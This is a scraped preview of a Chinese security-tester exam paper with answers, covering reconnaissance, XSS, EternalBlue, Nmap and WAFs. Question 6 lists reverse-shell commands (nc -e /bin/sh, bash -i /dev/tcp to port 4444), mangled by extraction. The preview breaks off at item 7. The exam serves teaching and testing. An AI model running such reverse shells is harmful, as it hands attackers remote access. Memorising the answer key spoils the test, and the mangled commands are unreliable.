2026年信息安全测试员网络安全攻防实战演练试卷及答案.docxVIP

  • 2
  • 0
  • 约6.28千字
  • 约 17页
  • 2026-04-24 发布于四川
  • 举报

2026年信息安全测试员网络安全攻防实战演练试卷及答案.docx

2026年信息安全测试员网络安全攻防实战演练试卷及答案

一、单项选择题(共10题,每题2分,共20分)

1.渗透测试预攻击阶段的核心任务是()。

A.漏洞利用

B.信息收集

C.权限维持

D.痕迹清除

答案:B

2.以下哪种漏洞属于客户端安全漏洞?()

A.SQL注入

B.命令注入

C.XSS

D.文件包含

答案:C

3.某日志中出现“445端口大量SYN包请求”,最可能的攻击是()。

A.DDoS攻击

B.永恒之蓝(MS17-010)

C.勒索软件

D.钓鱼攻击

答案:B

4.使用Nmap进行服务版本检测的命令参数是()。

A.-sS

B.-sT

C.-sV

D.-sU

答案:C

5.以下哪项是Web应用防火墙(WAF)的主要功能?()

A.加密传输数据

B.检测并拦截SQL注入、XSS攻击

C.管理用户权限

D.扫描内网主机

答案:B

6.若目标系统为Linux,通过SSH反弹shell的常用命令是()。

A.nc-e/bin/sh004444

B.bash-i/dev/tcp/00/444401

C.meterpreterreverse_tcp

D.msfvenom-pwindows/meterpreter/reverse_tcp

答案:B

7.JWT(JSONWebToken

文档评论(0)

1亿VIP精品文档

相关文档